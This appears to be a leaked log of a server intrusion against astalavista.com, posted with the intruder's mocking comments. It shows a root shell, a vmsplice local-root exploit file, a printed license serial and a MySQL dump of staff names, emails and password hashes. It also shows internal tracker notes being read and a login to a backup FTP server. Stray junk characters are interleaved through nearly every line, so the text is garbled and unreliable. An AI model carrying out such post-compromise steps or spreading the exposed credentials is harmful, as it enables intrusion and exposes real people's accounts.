sh-3.2# cd com3 X) ^; Q0 U9 E
sh-3.2# ls -la
0 f0 ]+ Z6 p4 u1 ]5 `. P i7 Ptotal 1412086 e1 Q: n" D; `
drwx–x–x 10 com com 4096 Apr 28 12:40 .7 \) G- K6 B. g) s9 ]
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 j7 Z" z# a7 Q) ^5 ^' ~/ H; X# z
drwx—— 2 com com 4096 Jun 4 04:04 backups* E, U; _/ u: y, b: l" J/ q. ?7 f8 d
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
! Z1 R4 g/ N& p" U1 @1 ?' S4 b" [) Z$ ndrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system, q X( r K+ ^! q
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
. c; M+ G! c) I-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
& B& m* P5 V8 |) `-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
, F" |- Y8 P$ K/ @-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc( f9 Q) t" c7 f
drwx–x–x 3 com com 4096 Jan 29 2008 domains
4 i- [7 b/ C2 L3 R! o-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
8 F/ z! P" p( G' s+ Xdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap2 h, X3 a. L# m# k$ R
-rw——- 1 com com 69 Nov 18 2008 .lesshst# U; f, O D6 [% p; T+ u, t
drwx—— 2 com com 4096 Sep 24 2007 mail
. R% I6 G6 P% u8 s-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
. s4 ]* T' O& gdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp% P5 [. z6 t7 d% {4 p8 J
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
# U* l1 ]8 d# N/ @; _-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
: P$ c; D2 P" `: kdrwx—— 2 com com 4096 Aug 26 2008 .ssh [' Z. f# M9 \" M+ z8 m: @0 g7 M
-rwx—— 1 com com 8515 Feb 10 2008 t
: v2 u7 _8 }( [- n& v8 ^2 q-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c: k, G% ?6 Q# u' I
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp7 R8 l7 V) J5 ~2 Q! B3 S2 A9 F5 k
-rw-rw-r– 1 com com 617 May 20 2008 .toprc" k5 `- `9 ?" |' W! w1 p
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
8 T5 u; Y5 e' t7 _, S& S% R y-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
! |2 y1 g. q: ~6 c- n/ l-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
& D$ v, ^. [- l! o( E8 k$ N# M" ?$ ^! R5 c5 A6 i
sh-3.2# head t.c
2 s3 `# v l; }/*
9 H, q0 V. w: T* \/ @; Z6 M' A9 {/ m* jessica_biel_naked_in_my_bed.c; M/ m8 _# S/ a
*
2 A* T' Z, a" `0 Y3 F* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
/ z9 H) H) M! a! X* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
+ s0 i: q; o& f W3 P9 _: r7 x: ]* Stejnak je to stare jak cyp a aj jakesyk rozbite.# v, l# r$ @3 w* w
*
* {1 ?6 a( |/ |0 U: R* Linux vmsplice Local Root Exploit; }+ W! f" x( U0 }$ m$ K0 @
* By qaaz8 Q3 V1 ]& ?" O9 c6 g
*& z( \* I& {8 C3 R* t
/ V' m& I Z y7 W) ]% ]- dsh-3.2# cd /
" a% m' L" J w0 s) n0 J' C" g& _sh-3.2# ls -la
( [" @& n& s. k, K+ K9 Gtotal 3607 P7 v# F' S/ i$ z' l
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .- k( @5 O J5 l: G, ]" j/ D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 q5 s: {: S# i
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group h5 b) K7 `" Y' J# M+ [& f
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user( a& b- [% Q( i5 C1 v8 }4 _5 h" z
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db" [/ i- O( J, t
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck4 B! W4 Z6 o4 G$ S$ U) b
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel; B- r( p% A( S, P5 [
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup1 u: V. G& @/ ^6 y9 f( [
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin _8 m" X" k/ Y& K
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot: {. K/ M8 _9 X, Z, o- I# }
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
2 j+ ^8 S' F8 p% C1 `8 ^1 b' odrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc7 h1 f* Q& ^+ b9 q0 A* b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home. [ y! `+ h5 p5 Q' i" A
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf! K9 o! U+ g& d* N# T
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
0 \+ y- o3 D7 T' Edrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
d; Q$ t$ l4 X+ t* Edrwx—— 2 root root 16384 Sep 11 2007 lost+found9 h1 }$ p( n& Y; N+ h
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
( m1 Y. c7 c6 Jdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
2 Y4 G1 O* a& \/ Tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt7 _$ H. @4 |5 n3 V0 ]
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg$ E% S! g W$ v/ s; n4 ^
drwxr-xr-x 2 root root 0 Jun 3 02:43 net8 ]9 ~9 c. t6 b# j F) }$ l
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt0 Q+ s, q( \: k
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc9 s. g8 s* @5 S: `
drwxr-x— 15 root root 4096 Jun 4 08:40 root
# n* Z6 g* G6 M6 s( fdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin$ L4 Q I6 w" F% o
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux0 h* @1 j7 B0 L. R4 ~6 B; O) t
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
/ `2 K/ H: E( [, r& B. _2 A* Odrwxr-xr-x 11 root root 0 Jun 3 02:42 sys% l$ u) L) i8 o1 X! r5 Y
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp5 |2 I. i! K8 a a1 y" y7 v& U; J
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
; W3 K; K0 ^6 K$ w0 j+ pdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
. S4 f6 n$ H7 [
0 \; W$ q: l" ~* ^% W# J: n" vsh-3.2# cd opt' {3 J) _) K2 _7 N2 o
sh-3.2# ls -la
6 }' [6 q' _/ jtotal 20- \4 a; M9 C, m' w! u% F
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .) q6 ?! f2 H, m# o) O, N
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 O! B+ h% G3 T5 r
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws( |2 V% n' ^ ^% w9 p" S. a
1 C4 O( E# m! ^1 n$ a
sh-3.2# cd lsws/: N6 w* K' P: l! K" m# q
sh-3.2# ls -la4 t' k$ k& b4 e f/ G. o2 D
total 1088 _: _; V) ?- ]$ L8 \0 ^: U
drwxr-xr-x 15 root root 4096 Mar 20 2008 .) U0 |0 x/ q6 P1 |+ [
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..) h- _- |: S9 F( ]% |; @2 W
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
- b" f& L9 [* X1 m6 cdrwxr-xr-x 13 root root 4096 May 29 15:10 admin$ O2 Y Z F3 [8 ^
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
& A! W% E8 A u, x/ Bdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
" k6 b( e& i0 a Pdrwx—— 4 apache apache 4096 Jun 3 02:43 conf( ?- _4 m) m% o+ ^* ~/ _6 o
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
( {1 i8 K8 W$ ]* D8 A9 h: Z0 idrwxr-xr-x 2 root root 4096 Sep 15 2008 docs+ W# ?% s' _8 x& S2 U) F
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
s' h0 z2 Y: udrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
: H& o5 ?$ U! b+ K2 d-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
0 J+ P$ R, K( a9 v-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
- v4 D/ T5 d4 ^! c9 ^; T-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
& k2 x: n) y. C6 u8 \% q-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP" G( r1 m& u. N; i
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
4 d$ x1 u ]9 e1 Y g2 adrwxr-xr-x 2 root root 4096 Mar 20 2008 php
# v6 l2 i) x5 T: {8 C. M$ M0 f' ldrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild# S( c! U9 U) u" p( R
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
/ [4 s# x1 i) F6 y# F% a7 D; h3 J-rw-r–r– 1 root root 6 May 29 15:10 VERSION
+ _3 D1 @# B) ?, M% b+ d' \& Y8 M6 ^+ |' l: m
sh-3.2# cd conf
+ H+ e {( E* Y f: J v6 W# Gsh-3.2# ls -la
3 }4 g1 A9 k, Y0 C7 [total 48# J9 p. O4 q- z& ^) ]
drwx—— 4 apache apache 4096 Jun 3 02:43 ., v1 @6 O. s5 I2 r4 U
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..) g- P, D! H' k
drwx—— 2 apache apache 4096 Mar 20 2008 cert
4 G" n1 R, M: |$ t$ B2 @-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml# I5 o" c, P/ m1 I5 ?! q$ T4 H
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak& n0 \6 v9 P2 N+ G. d. r* ~6 ^
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last5 Y0 p" u2 L9 H2 t1 m$ q
-rw——- 1 apache apache 256 May 29 15:10 license.key4 [5 _0 n3 }* ?% g; R7 T$ A% B$ b
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
8 x; W8 t& @; g1 [: m) y-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
( q4 G0 C8 o; b% j6 ~1 l-rw——- 1 apache apache 20 May 29 15:10 serial.no9 m1 X) _* b; w
drwx—— 2 apache apache 4096 Mar 20 2008 templates* O' }* a) @& U! T
4 Y: W7 p, X2 e6 Y. C- U0 h
sh-3.2# cat serial.no
7 @: H+ H( |: \& nIbDl-oVsO-CKqL-wVRa
( w" s a s7 ]3 s; n& n4 z7 N# k0 I5 h# U
sh-3.2# mysql
# j5 e3 U# R+ K# n( I4 Z1 ?Welcome to the MySQL monitor. Commands end with ; or \g.' x$ N: G0 q4 ?/ L
Your MySQL connection id is 286844- o4 T- g1 Y* `0 J9 L
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
# d5 X2 b( ~+ d' F+ z+ `' w: T6 }" Z9 w' Z8 v
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# I4 @; z3 M" z& D' t/ o7 C
5 v, {% w9 n/ }' p) q# Z
mysql> show databases;
9 M! x3 y. j) o2 ]4 o5 F$ M* v7 A+———————–+
" ~& C) S, ]# O* s6 G4 Z| Database |
$ {7 k# P4 e+ ?' y+———————–+( l3 k+ f4 I4 H+ ~2 u/ @1 ?
| information_schema |
+ j" R0 P, R1 s/ B3 m( o4 B- M| astanet_ads |
$ i5 Q( D' g1 N3 L( ~+ f| astanet_mailing_lists |* w/ L9 e& n% u# I/ l7 x
| astanet_mediawiki |
6 Z3 {; [( X. E- A3 A/ Z| astanet_membersystem |9 E: j% r* E/ K6 r+ i4 y6 }
| com_contrexx |
6 Z: D( U1 q3 x$ {| com_contrexx2 |) |9 o& V3 Z$ o, Y- w
| com_contrexx2_live |% ?5 m) Y2 N( X1 e# T8 p) ]/ R6 J
| da_roundcube |
. z8 M9 f2 q2 @ q4 k# ~7 a5 m/ x1 U! [| dolphin |' I' d5 ^& k# q, M/ j
| ideapool |
; ?8 T9 R; i4 T3 I| mysql |
2 j- ?9 ~* p) }9 p( A1 P" }| test |8 N) Y+ L. {. M4 I. F7 P8 `# E4 U
| yourmaster |
2 w) s) p+ o' s, i! _) j+———————–+: I# S; Z8 T6 z2 c5 S4 b, w
14 rows in set (0.00 sec)! b) F7 _# l1 C+ K q3 m7 h
1 s ?8 f* h% o8 _9 Mmysql> use ideapool
& C+ z. r: F* zDatabase changed$ W6 Q3 L; v1 @
mysql> show tables;
8 Q+ f) _3 U* R, Q+———————————–+$ ^" r/ s& ^; P1 L5 y2 x) t$ K0 K
| Tables_in_ideapool |
. a7 I' t0 S8 ^. O+———————————–+; d! E' B2 C. [+ ]8 i
| eventum_columns_to_display |
0 \ ]( c# d0 I% e2 ~. R% `| eventum_custom_field |6 k- I& s8 K6 G" R1 s# p# N( ^
| eventum_custom_field_option |
9 U( V% W. M u/ M| eventum_custom_filter |
' Q$ h1 z E$ e4 r/ Q' @% @" e) a| eventum_customer_account_manager |0 l0 B) D% W/ g
| eventum_customer_note |; F. I/ s9 Y+ F8 i7 z8 n6 D7 f6 n8 R
| eventum_email_account |$ q/ t6 g6 L5 @# N) V$ o1 q0 |
| eventum_email_draft |) x* `# z( [& r' U
| eventum_email_draft_recipient |% f1 Y0 @4 O8 D! G3 A
| eventum_email_response |, s9 h$ w3 P4 D- Q. W% w1 [( q
| eventum_faq |
/ X6 s2 r: y* f& Q7 G| eventum_faq_support_level |0 `. c2 U, Y$ R5 k9 q7 a0 \
| eventum_group |% | J% o5 f+ Y, e& u; [$ k
| eventum_history_type |
' K6 x3 C; l; L+ a| eventum_irc_notice |. Q1 j/ j7 M4 |: h C2 O5 Q
| eventum_issue |3 z0 G9 D4 d+ r' z ?. f8 t0 ]
| eventum_issue_association |
0 R; y( o% w3 {9 M+ \* ]| eventum_issue_attachment |7 K$ d' W0 L" `7 E/ h" v# K
| eventum_issue_attachment_file |( r9 O. w" ^/ O c
| eventum_issue_checkin |
1 \8 x; c2 P6 P| eventum_issue_custom_field |% B) A% K v' x& r
| eventum_issue_history |
y; u; o4 O V; J$ B| eventum_issue_quarantine |
4 O% c' v: b! O3 X| eventum_issue_requirement |& E0 H8 ^ I/ J% B" F
| eventum_issue_user |
9 t2 B7 i8 [0 ~9 c| eventum_issue_user_replier |
( P y3 S) z+ k5 H* L* v R8 k" k6 h| eventum_link_filter |5 i/ o" `4 |, q/ T0 Z; {/ }( L
| eventum_mail_queue |
, j; W( l0 e" i9 x% A# H| eventum_mail_queue_log |
) v& W J) a9 @2 C6 ^! e# F| eventum_news |
9 A( M0 U8 Q; N- C+ C| eventum_note |
* o8 t9 t3 g7 S, Y9 M| eventum_phone_support |
5 q3 v' } y* \. h5 l3 T| eventum_project |. g. @' s ^, e# G2 x3 Y+ |0 a: g
| eventum_project_category |
) B# ]. u& T; B5 w$ z4 T7 `| eventum_project_custom_field |
9 e' m9 o7 E% C1 `: Z5 n$ W, ~$ l/ C| eventum_project_email_response |& _/ z7 p, l5 k- l/ v8 {9 [
| eventum_project_field_display |
3 O) p$ u8 S' b, q( R# ^# A5 v| eventum_project_group | {1 ?. Y6 ^4 y$ g- U# n* D
| eventum_project_link_filter |
% b6 F5 o$ n* D5 _! {| eventum_project_news |" ~6 j' I: y g N! ?; F
| eventum_project_phone_category |
% f- v0 r0 }' `$ }| eventum_project_priority |: M! {! V+ q7 H5 `7 |7 C
| eventum_project_release |6 U) d7 \ ]- U* |9 J/ y
| eventum_project_round_robin |) L4 Z Q# h7 X" \% u2 R4 [
| eventum_project_status |
1 H1 ~, w1 A8 T1 d1 E+ @| eventum_project_status_date |
# ^5 B" k, @3 J C' K2 z" r| eventum_project_user |
8 V, c% I1 X5 C T. g| eventum_reminder_action |- \# I. H0 `8 H+ ]0 w" j: P* |
| eventum_reminder_action_list |
5 P: S1 D/ O6 T' U! h. @; M6 F1 S" W| eventum_reminder_action_type |+ n2 ~, w4 }' f: c3 x3 k$ v: D
| eventum_reminder_field |6 P/ J. A; n5 l; J0 G
| eventum_reminder_history |& E* U5 _ j6 X% R% n. E
| eventum_reminder_level |; x# E; F( C* k
| eventum_reminder_level_condition |! K/ v6 r- b) t6 f1 f( H8 \
| eventum_reminder_operator |
/ u9 p$ t0 g: @' g| eventum_reminder_priority |" {/ g( @) W; l, r: M7 N1 F
| eventum_reminder_requirement | ]7 X- D( Q, E: A* J/ c3 F
| eventum_reminder_triggered_action |
) n, l0 d7 {* ~8 ?2 s1 C| eventum_resolution |
! X5 w M3 m. q7 s3 L/ ?| eventum_round_robin_user |
+ [# Z' `7 e' ?. d: {( }+ J| eventum_search_profile |: g, ?) _3 B* r3 V. L" z
| eventum_status |8 p$ _- i& ~ u# _) a/ m4 b
| eventum_subscription |1 e* Y0 s. b, D6 G0 z9 G
| eventum_subscription_type |
& ^9 [2 [# B6 r% J5 g: i| eventum_support_email |
3 A- D2 l# {: |, U V| eventum_support_email_body |
4 u5 l* j4 K1 P* p6 n" ]7 G" [| eventum_time_tracking |
- Q' ~ R6 D* B- e! l+ u| eventum_time_tracking_category |
5 |4 ]' q! m, D0 p& y5 r! D9 X' [| eventum_user |# Q# c3 M) ^! R8 @* K; ]
+———————————–+2 U# T) {5 G5 J# m. A
69 rows in set (0.00 sec)5 V" U- o7 V( }7 W# n4 J
; Y1 J" W( g7 |; @5 y1 cmysql> describe eventum_user;( b; e& V" l2 y% F S# e- w
+————————-+——————+——+—–+———————+—————-+
3 q) z- Q- ]2 [ Z- d4 g| Field | Type | Null | Key | Default | Extra |
5 V, V' u+ p# C: j& P9 f* }/ O+————————-+——————+——+—–+———————+—————-+
6 k/ e3 T' K; D* h u0 i9 c| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |1 D6 W' O7 L% P, W
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |; s# I# g# x9 l3 D' G; Y
| usr_customer_id | int(11) unsigned | YES | | NULL | |+ h0 q8 _1 ^0 Y; \5 q3 v: E
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |, Q, ]3 W8 L7 g
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |/ c9 q. E) S1 x' g$ k
| usr_status | varchar(8) | NO | | active | |
/ `. n& o* _; P| usr_password | varchar(32) | NO | | | |% `5 u+ J: b- u" B" Q- B; Y F9 b
| usr_full_name | varchar(255) | NO | | | |
8 _) U1 A( i: B& i) J| usr_email | varchar(255) | NO | UNI | | |4 ~5 i* J5 W5 s/ l* U! J% z
| usr_preferences | longtext | YES | | NULL | |
* V/ I% j4 T' J; S7 f| usr_sms_email | varchar(255) | YES | | NULL | |
) I o- ^$ s4 e0 C) X0 b5 V0 u; ^; m| usr_clocked_in | tinyint(1) | YES | | 0 | |/ o7 p* @1 c2 M/ h* D+ I3 E
| usr_lang | varchar(5) | YES | | NULL | |
$ {9 F) {4 y r6 j+————————-+——————+——+—–+———————+—————-+) F( A+ T4 G' d. F
13 rows in set (0.00 sec)
6 n8 \- Y+ K& E8 p4 O
9 _* b G: [- \$ h* ?mysql> select usr_full_name,usr_email,usr_password from eventum_user;
* H/ l* y7 V6 H r& k$ E- o2 o( X+———————-+——————————-+———————————-+
5 z) V& b$ @$ P9 S' G! q| usr_full_name | usr_email | usr_password |6 |$ J& u7 e) x' q% J/ o
+———————-+——————————-+———————————-+" M) p5 j8 y5 f
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
. M% z |; h- ?' W4 W! x9 ^| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
% Z! O d. j; R4 b& n7 ~| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |" r* V. V8 s; }) r
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
! s$ E1 i3 C n* [| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
. y k5 s" L: j$ ?0 y' ~, G9 ~( @| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |* v3 |: |$ U+ U; E" i. r) d
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |! U" ~) D8 K6 L8 x% r& Y4 W
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
: f5 q) ^, k* l3 f; F/ i' B$ J| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |1 y( ^( J- n8 Z% s; H+ v
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
/ B( V5 K D0 I/ S1 _/ ]' ?| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |5 I s3 r) `8 K* N
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |. O1 i/ _$ A4 @' z1 k2 {6 j# F
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |/ R; `) a n) `' L( j/ O
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
$ {) v# a8 V/ ]% H; B% o| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |' p( \9 \) p0 `
+———————-+——————————-+———————————-+
- u/ L6 t, j/ `( R7 X15 rows in set (0.00 sec)
' d- S8 S4 o3 O# u0 b* O5 A, U( B& |; [+ @' J6 W) @ E( w ?0 ~9 r
mysql> select iss_description from eventum_issue where iss_id = 43;
! ^2 h1 P, G g3 D( P- k8 k+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+, h0 Y! V! x6 W- x. s+ ]" S [
| iss_description $ B+ S+ S% ~7 Q& h
|
7 a' z( ^8 A& g( x+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
7 ^0 l& O$ }1 x% ^& W| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be( D& a: E8 J- \9 r" E7 y
connected for 90 mins… 120mins… so what i propose is something like: r8 k4 \ {/ T. O& O3 Y5 Q
链接标记[url]http://www.surfthechannel.com/[/url]0 V I; Q* r) N( z
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system$ D9 I2 H. ?( p7 S# K6 E8 a
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
2 C- I9 n2 P& l/ N# i( e/ u1 \& Wbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off( C- Y5 X& m/ O T, X, d* }
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
$ `! [0 B" G# ~: d* H# K2 Z6 r9 v' \
We could also put advertisement during play on the flash video player itself… extra $$…
* |6 A& t; Y9 C; V: T( ], h) `0 D
By sykadul |" l& l6 y% W) g9 n( d
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ F. N6 Q! Q7 B' _6 \' H
1 row in set (0.00 sec)
9 [, B& u$ W0 J9 q) v5 O; ^
& _1 J7 V# w% c& C, Y8 \// Money and extra $$ is all they care about. remember that.
0 p$ o% M- w2 r m) w, ~( }) m9 L# a4 k# M( K
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;/ c, ` _8 g1 f2 T" o
+————————+——————————————————————————————————————————————————————————————————————————————-+
' |5 [" W+ V& J8 ]& k, _. ?& d5 o| iss_summary | iss_description 8 w% s% \; `/ m& k" F
|
! p2 {; P+ S# |, E* L4 I+————————+——————————————————————————————————————————————————————————————————————————————-+
9 x: |0 v; H- q| Forum for REAL EXPERTS | Hello,
, k# z# y; ~5 e- E* b6 V) [' ^; N/ r. R0 ^5 ~2 R- A/ h
Ishtus and I,
$ Q1 W6 A# d' _) E) r9 T4 d
; ?. ^9 V1 s! N0 z5 ZCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
; Q5 }" R& F$ [( H7 wONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
: J. o4 }: K. a H7 J1 F0 k' s
# |8 Q7 Z Y( L* d( t2 YOne example a friend of mine from coresecurity.com!
/ ~) ]4 E4 f+ J3 A6 Y; T; q+ K& q$ Y0 d# h) J/ Q
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc.." i+ u4 M: R# W" n$ ^
$ z, t+ [- t9 M# I1 Z# ~; M
|6 y ^) ]! Q [6 D' }" p% [1 D
+————————+——————————————————————————————————————————————————————————————————————————————+
7 U3 e2 g+ @; {7 Q) Z3 i1 row in set (0.00 sec)
1 J% ~! u. d/ I& O" ~; b; }
: o2 x3 o( A* a* c// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
0 h/ O* r! H7 p) [! _) a1 T' |4 K2 Y+ K
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;/ d( t8 C. k0 c
+——————+———————————————————————————————+' v! b- x. l. @% F) I
| iss_summary | iss_description |$ s& _: f9 @5 [8 A8 S+ v
+——————+———————————————————————————————+! i+ K+ p" c9 d- Y% J0 ?, \; Y
| Website guidance | Virtual Girl which guides you trought the website.
$ i& }& O7 j8 e W# v+ r; T. D6 J! R0 t# D; R, O
We need a girl with who you can ( talk )!!!, ` K5 k. `/ C) ]% P: P
Also for the News!6 w+ {3 ]9 O6 e4 q, O! x; q5 [
So my suggestion is a girl who read you the news loud if you like!
$ K( G; u# A4 J. uyou can choose between read yourselfe or she read it for you or both!
0 ^6 r1 S- P r% K
3 ^' {- c8 T0 Z6 gGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
. _3 o. I$ W6 S9 G" l6 M3 f8 n, X; R5 |& u7 C4 ?9 V: C% [& b, Z
Have a look on the example girls!!
$ D6 K! X: |7 A: {3 j, s6 V$ t( z7 J! w" l
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
! @" j1 d9 `6 W* s* s/ o' h/ ]& k, f- a9 H3 ^
or that
: n( j# c6 I3 E
: s9 B7 Y& F- V, z" W! C6 M: n链接标记[url]http://www.yellostrom.de/[/url]
, O, \, e2 g |1 r
. e3 n) _9 ~( y% R# U, R|
) t7 h, }) }6 m1 P. l+——————+———————————————————————————————+
; U- ]/ B; u3 w& f1 row in set (0.00 sec)
" U# z4 l! ]: Q. n
$ A' F9 B2 o/ q// ha ha.7 t+ } i' u' k3 p# e5 c) I8 H
8 ~$ Z* ~) F* s: E. z$ m% p1 \
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;- Z( t) A' G5 h! \. p
+————————–+———————————————————————————————————–+* l2 M; z8 d! D
| iss_summary | iss_description |
1 o, Z% P% f* d: t# z+————————–+———————————————————————————————————–+
9 ? g Q1 u' v) f- }* u- k| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |8 R) R) i4 G8 [4 D* Z0 j k' [, d4 w
+————————–+———————————————————————————————————–+: t0 n( @, ? Y7 y" s3 q
1 row in set (0.00 sec)- E: u+ ]: U/ _
/ X: U0 j. O$ V
// LOL.& _$ f# i# q) o( ^0 w
3 Z: O# m( P9 F$ P% Rmysql> exit
3 v& C( q( g0 C VBye* w+ `! g; y/ w0 M( ]/ t2 P
/ O6 V9 {5 g7 qsh-3.2# ftp 212.254.194.163& G4 V* M( B2 V% J2 U! m; Z
Connected to 212.254.194.163.% j- A k$ H- x- Y# ~+ V7 ]! q
220 BackupCOM_VW FTP server ready.
7 t# ^& L2 s9 Q# j3 M% ^9 X504 AUTH: security mechanism ‘GSSAPI’ not supported.
1 Q. B h0 }7 s9 c) }504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
# M0 }5 }: a: [- j( IKERBEROS_V4 rejected as an authentication type
2 S D% N% b- \7 j! ~( E1 {1 g2 IName (212.254.194.163:root): astalavista.com, F" e: w9 p3 j! O/ `% D8 S. d0 b
331 Password required for astalavista.com., l8 K" F( S! `* N# q- K# p9 `
Password:
2 y& i! B& i; O4 T! g. u- z230 User astalavista.com logged in.
+ n/ P! n% L+ ], }, SRemote system type is UNIX.0 J, G# q% x( Z9 F: P7 B
Using binary mode to transfer files./ @' i* N9 W- a- F8 D
ftp> ls -la
! O& V: s6 d$ O1 i227 Entering Passive Mode (212,254,194,163,2,188)
7 ^' Q1 j1 F# h150 Opening BINARY mode data connection for ‘file list’.
. w9 O, G" g; a% C2 O5 X/ N! Wdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
5 }2 t- i9 Z* N( }: b226 Transfer complete.
, f4 i f% z$ F1 Kftp> cd astalavista.com4 Q1 T3 K/ ?7 z4 M
